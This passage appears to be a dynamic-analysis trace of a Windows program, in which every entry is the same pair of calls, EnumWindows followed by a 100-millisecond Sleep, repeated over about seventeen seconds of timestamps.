EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.579] Sleep (dwMilliseconds=0x64) [0258.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.627] Sleep (dwMilliseconds=0x64) [0258.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.704] Sleep (dwMilliseconds=0x64) [0258.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.750] Sleep (dwMilliseconds=0x64) [0258.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.830] Sleep (dwMilliseconds=0x64) [0258.855] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.858] Sleep (dwMilliseconds=0x64) [0258.937] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.938] Sleep (dwMilliseconds=0x64) [0259.006] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.007] Sleep (dwMilliseconds=0x64) [0259.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.124] Sleep (dwMilliseconds=0x64) [0259.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.219] Sleep (dwMilliseconds=0x64) [0259.303] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.305] Sleep (dwMilliseconds=0x64) [0259.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.357] Sleep (dwMilliseconds=0x64) [0259.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.420] Sleep (dwMilliseconds=0x64) [0259.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.439] Sleep (dwMilliseconds=0x64) [0259.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.591] Sleep (dwMilliseconds=0x64) [0259.669] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.673] Sleep (dwMilliseconds=0x64) [0259.726] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.730] Sleep (dwMilliseconds=0x64) [0259.849] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.850] Sleep (dwMilliseconds=0x64) [0259.891] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.892] Sleep (dwMilliseconds=0x64) [0259.947] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0259.949] Sleep (dwMilliseconds=0x64) [0260.033] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.033] Sleep (dwMilliseconds=0x64) [0260.099] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.100] Sleep (dwMilliseconds=0x64) [0260.113] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.115] Sleep (dwMilliseconds=0x64) [0260.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.157] Sleep (dwMilliseconds=0x64) [0260.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.235] Sleep (dwMilliseconds=0x64) [0260.295] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.296] Sleep (dwMilliseconds=0x64) [0260.400] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.402] Sleep (dwMilliseconds=0x64) [0260.488] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.488] Sleep (dwMilliseconds=0x64) [0260.529] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.531] Sleep (dwMilliseconds=0x64) [0260.583] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.584] Sleep (dwMilliseconds=0x64) [0260.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.625] Sleep (dwMilliseconds=0x64) [0260.707] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.709] Sleep (dwMilliseconds=0x64) [0260.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.783] Sleep (dwMilliseconds=0x64) [0260.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.936] Sleep (dwMilliseconds=0x64) [0260.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0260.998] Sleep (dwMilliseconds=0x64) [0261.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.062] Sleep (dwMilliseconds=0x64) [0261.155] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.157] Sleep (dwMilliseconds=0x64) [0261.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.249] Sleep (dwMilliseconds=0x64) [0261.306] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.307] Sleep (dwMilliseconds=0x64) [0261.345] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.347] Sleep (dwMilliseconds=0x64) [0261.388] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.389] Sleep (dwMilliseconds=0x64) [0261.470] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.471] Sleep (dwMilliseconds=0x64) [0261.514] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.515] Sleep (dwMilliseconds=0x64) [0261.607] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.608] Sleep (dwMilliseconds=0x64) [0261.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.690] Sleep (dwMilliseconds=0x64) [0261.763] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.765] Sleep (dwMilliseconds=0x64) [0261.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.826] Sleep (dwMilliseconds=0x64) [0261.938] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.939] Sleep (dwMilliseconds=0x64) [0261.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0261.983] Sleep (dwMilliseconds=0x64) [0262.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.062] Sleep (dwMilliseconds=0x64) [0262.146] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.147] Sleep (dwMilliseconds=0x64) [0262.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.232] Sleep (dwMilliseconds=0x64) [0262.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.299] Sleep (dwMilliseconds=0x64) [0262.311] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.312] Sleep (dwMilliseconds=0x64) [0262.357] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.358] Sleep (dwMilliseconds=0x64) [0262.381] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.382] Sleep (dwMilliseconds=0x64) [0262.388] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.389] Sleep (dwMilliseconds=0x64) [0262.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.451] Sleep (dwMilliseconds=0x64) [0262.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.545] Sleep (dwMilliseconds=0x64) [0262.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.640] Sleep (dwMilliseconds=0x64) [0262.799] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.800] Sleep (dwMilliseconds=0x64) [0262.868] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.869] Sleep (dwMilliseconds=0x64) [0262.900] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.902] Sleep (dwMilliseconds=0x64) [0262.923] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.924] Sleep (dwMilliseconds=0x64) [0262.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0262.969] Sleep (dwMilliseconds=0x64) [0263.079] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.081] Sleep (dwMilliseconds=0x64) [0263.204] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.206] Sleep (dwMilliseconds=0x64) [0263.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.298] Sleep (dwMilliseconds=0x64) [0263.349] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.350] Sleep (dwMilliseconds=0x64) [0263.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.407] Sleep (dwMilliseconds=0x64) [0263.492] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.493] Sleep (dwMilliseconds=0x64) [0263.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.547] Sleep (dwMilliseconds=0x64) [0263.608] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.610] Sleep (dwMilliseconds=0x64) [0263.791] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.797] Sleep (dwMilliseconds=0x64) [0263.935] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0263.936] Sleep (dwMilliseconds=0x64) [0264.082] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.083] Sleep (dwMilliseconds=0x64) [0264.188] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.190] Sleep (dwMilliseconds=0x64) [0264.299] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.300] Sleep (dwMilliseconds=0x64) [0264.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.389] Sleep (dwMilliseconds=0x64) [0264.420] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.421] Sleep (dwMilliseconds=0x64) [0264.435] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.437] Sleep (dwMilliseconds=0x64) [0264.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.451] Sleep (dwMilliseconds=0x64) [0264.499] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.500] Sleep (dwMilliseconds=0x64) [0264.566] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.567] Sleep (dwMilliseconds=0x64) [0264.607] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.609] Sleep (dwMilliseconds=0x64) [0264.680] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.682] Sleep (dwMilliseconds=0x64) [0264.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.781] Sleep (dwMilliseconds=0x64) [0264.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.861] Sleep (dwMilliseconds=0x64) [0264.948] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0264.959] Sleep (dwMilliseconds=0x64) [0265.017] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.018] Sleep (dwMilliseconds=0x64) [0265.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.064] Sleep (dwMilliseconds=0x64) [0265.109] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.111] Sleep (dwMilliseconds=0x64) [0265.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.172] Sleep (dwMilliseconds=0x64) [0265.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.265] Sleep (dwMilliseconds=0x64) [0265.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.359] Sleep (dwMilliseconds=0x64) [0265.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.561] Sleep (dwMilliseconds=0x64) [0265.612] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.613] Sleep (dwMilliseconds=0x64) [0265.661] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.663] Sleep (dwMilliseconds=0x64) [0265.772] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.774] Sleep (dwMilliseconds=0x64) [0265.855] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.859] Sleep (dwMilliseconds=0x64) [0265.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0265.923] Sleep (dwMilliseconds=0x64) [0266.029] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.033] Sleep (dwMilliseconds=0x64) [0266.125] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.126] Sleep (dwMilliseconds=0x64) [0266.203] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.205] Sleep (dwMilliseconds=0x64) [0266.229] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.230] Sleep (dwMilliseconds=0x64) [0266.273] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.275] Sleep (dwMilliseconds=0x64) [0266.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.329] Sleep (dwMilliseconds=0x64) [0266.370] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.371] Sleep (dwMilliseconds=0x64) [0266.413] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.413] Sleep (dwMilliseconds=0x64) [0266.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.438] Sleep (dwMilliseconds=0x64) [0266.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.452] Sleep (dwMilliseconds=0x64) [0266.479] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.483] Sleep (dwMilliseconds=0x64) [0266.524] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.526] Sleep (dwMilliseconds=0x64) [0266.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.576] Sleep (dwMilliseconds=0x64) [0266.617] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.619] Sleep (dwMilliseconds=0x64) [0266.690] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.692] Sleep (dwMilliseconds=0x64) [0266.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.766] Sleep (dwMilliseconds=0x64) [0266.805] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.806] Sleep (dwMilliseconds=0x64) [0266.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.861] Sleep (dwMilliseconds=0x64) [0266.912] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.913] Sleep (dwMilliseconds=0x64) [0266.925] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0266.927] Sleep (dwMilliseconds=0x64) [0267.020] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.021] Sleep (dwMilliseconds=0x64) [0267.070] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.072] Sleep (dwMilliseconds=0x64) [0267.158] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.160] Sleep (dwMilliseconds=0x64) [0267.217] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.219] Sleep (dwMilliseconds=0x64) [0267.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.297] Sleep (dwMilliseconds=0x64) [0267.388] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.392] Sleep (dwMilliseconds=0x64) [0267.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.455] Sleep (dwMilliseconds=0x64) [0267.534] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.535] Sleep (dwMilliseconds=0x64) [0267.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.610] Sleep (dwMilliseconds=0x64) [0267.631] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.632] Sleep (dwMilliseconds=0x64) [0267.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.638] Sleep (dwMilliseconds=0x64) [0267.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.673] Sleep (dwMilliseconds=0x64) [0267.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.767] Sleep (dwMilliseconds=0x64) [0267.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0267.925] Sleep (dwMilliseconds=0x64) [0268.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.032] Sleep (dwMilliseconds=0x64) [0268.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.172] Sleep (dwMilliseconds=0x64) [0268.259] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.261] Sleep (dwMilliseconds=0x64) [0268.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.346] Sleep (dwMilliseconds=0x64) [0268.377] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.378] Sleep (dwMilliseconds=0x64) [0268.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.423] Sleep (dwMilliseconds=0x64) [0268.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.485] Sleep (dwMilliseconds=0x64) [0268.575] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.576] Sleep (dwMilliseconds=0x64) [0268.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.670] Sleep (dwMilliseconds=0x64) [0268.730] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.731] Sleep (dwMilliseconds=0x64) [0268.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.782] Sleep (dwMilliseconds=0x64) [0268.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.842] Sleep (dwMilliseconds=0x64) [0268.905] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0268.906] Sleep (dwMilliseconds=0x64) [0269.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.061] Sleep (dwMilliseconds=0x64) [0269.127] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.128] Sleep (dwMilliseconds=0x64) [0269.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.236] Sleep (dwMilliseconds=0x64) [0269.299] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.300] Sleep (dwMilliseconds=0x64) [0269.332] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.334] Sleep (dwMilliseconds=0x64) [0269.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.342] Sleep (dwMilliseconds=0x64) [0269.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.361] Sleep (dwMilliseconds=0x64) [0269.408] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.409] Sleep (dwMilliseconds=0x64) [0269.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.499] Sleep (dwMilliseconds=0x64) [0269.595] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.596] Sleep (dwMilliseconds=0x64) [0269.687] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.689] Sleep (dwMilliseconds=0x64) [0269.775] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.776] Sleep (dwMilliseconds=0x64) [0269.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.842] Sleep (dwMilliseconds=0x64) [0269.929] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0269.931] Sleep (dwMilliseconds=0x64) [0270.052] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.055] Sleep (dwMilliseconds=0x64) [0270.209] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.218] Sleep (dwMilliseconds=0x64) [0270.323] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.324] Sleep (dwMilliseconds=0x64) [0270.393] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.394] Sleep (dwMilliseconds=0x64) [0270.466] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.471] Sleep (dwMilliseconds=0x64) [0270.566] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.567] Sleep (dwMilliseconds=0x64) [0270.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.609] Sleep (dwMilliseconds=0x64) [0270.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.624] Sleep (dwMilliseconds=0x64) [0270.670] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.672] Sleep (dwMilliseconds=0x64) [0270.694] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.695] Sleep (dwMilliseconds=0x64) [0270.699] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.701] Sleep (dwMilliseconds=0x64) [0270.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.765] Sleep (dwMilliseconds=0x64) [0270.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.858] Sleep (dwMilliseconds=0x64) [0270.936] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0270.937] Sleep (dwMilliseconds=0x64) [0271.029] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.030] Sleep (dwMilliseconds=0x64) [0271.083] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.084] Sleep (dwMilliseconds=0x64) [0271.097] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.098] Sleep (dwMilliseconds=0x64) [0271.146] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.147] Sleep (dwMilliseconds=0x64) [0271.178] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.179] Sleep (dwMilliseconds=0x64) [0271.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.234] Sleep (dwMilliseconds=0x64) [0271.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.297] Sleep (dwMilliseconds=0x64) [0271.470] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.471] Sleep (dwMilliseconds=0x64) [0271.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.581] Sleep (dwMilliseconds=0x64) [0271.673] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.674] Sleep (dwMilliseconds=0x64) [0271.771] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.773] Sleep (dwMilliseconds=0x64) [0271.830] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.831] Sleep (dwMilliseconds=0x64) [0271.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.876] Sleep (dwMilliseconds=0x64) [0271.928] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0271.932] Sleep (dwMilliseconds=0x64) [0272.001] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.003] Sleep (dwMilliseconds=0x64) [0272.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.093] Sleep (dwMilliseconds=0x64) [0272.185] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.186] Sleep (dwMilliseconds=0x64) [0272.264] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.265] Sleep (dwMilliseconds=0x64) [0272.338] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.344] Sleep (dwMilliseconds=0x64) [0272.391] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.392] Sleep (dwMilliseconds=0x64) [0272.438] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.440] Sleep (dwMilliseconds=0x64) [0272.614] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.615] Sleep (dwMilliseconds=0x64) [0272.759] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.760] Sleep (dwMilliseconds=0x64) [0272.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.766] Sleep (dwMilliseconds=0x64) [0272.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.936] Sleep (dwMilliseconds=0x64) [0272.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0272.984] Sleep (dwMilliseconds=0x64) [0273.098] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.100] Sleep (dwMilliseconds=0x64) [0273.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.158] Sleep (dwMilliseconds=0x64) [0273.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.217] Sleep (dwMilliseconds=0x64) [0273.269] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.270] Sleep (dwMilliseconds=0x64) [0273.317] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.318] Sleep (dwMilliseconds=0x64) [0273.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.328] Sleep (dwMilliseconds=0x64) [0273.393] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.394] Sleep (dwMilliseconds=0x64) [0273.432] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.436] Sleep (dwMilliseconds=0x64) [0273.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.482] Sleep (dwMilliseconds=0x64) [0273.555] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.557] Sleep (dwMilliseconds=0x64) [0273.657] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.658] Sleep (dwMilliseconds=0x64) [0273.767] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.768] Sleep (dwMilliseconds=0x64) [0273.861] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.862] Sleep (dwMilliseconds=0x64) [0273.899] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.901] Sleep (dwMilliseconds=0x64) [0273.905] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.906] Sleep (dwMilliseconds=0x64) [0273.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.951] Sleep (dwMilliseconds=0x64) [0273.998] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0273.999] Sleep (dwMilliseconds=0x64) [0274.135] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.149] Sleep (dwMilliseconds=0x64) [0274.226] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.227] Sleep (dwMilliseconds=0x64) [0274.269] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.270] Sleep (dwMilliseconds=0x64) [0274.313] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.314] Sleep (dwMilliseconds=0x64) [0274.348] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.350] Sleep (dwMilliseconds=0x64) [0274.397] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.398] Sleep (dwMilliseconds=0x64) [0274.467] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.469] Sleep (dwMilliseconds=0x64) [0274.516] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.517] Sleep (dwMilliseconds=0x64) [0274.557] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.563] Sleep (dwMilliseconds=0x64) [0274.594] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.595] Sleep (dwMilliseconds=0x64) [0274.622] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.624] Sleep (dwMilliseconds=0x64) [0274.721] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.722] Sleep (dwMilliseconds=0x64) [0274.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.798] Sleep (dwMilliseconds=0x64) [0274.892] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0274.892] Sleep (dwMilliseconds=0x64) [0275.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.108] Sleep (dwMilliseconds=0x64) [0275.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.219] Sleep (dwMilliseconds=0x64) [0275.259] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.261] Sleep (dwMilliseconds=0x64) [0275.280] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.281] Sleep (dwMilliseconds=0x64) [0275.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.329] Sleep (dwMilliseconds=0x64) [0275.344] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.344] Sleep (dwMilliseconds=0x64) [0275.395] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.397] Sleep (dwMilliseconds=0x64) [0275.486] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.487] Sleep (dwMilliseconds=0x64) [0275.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0275.580] Sleep (dwMilliseconds=0x64) 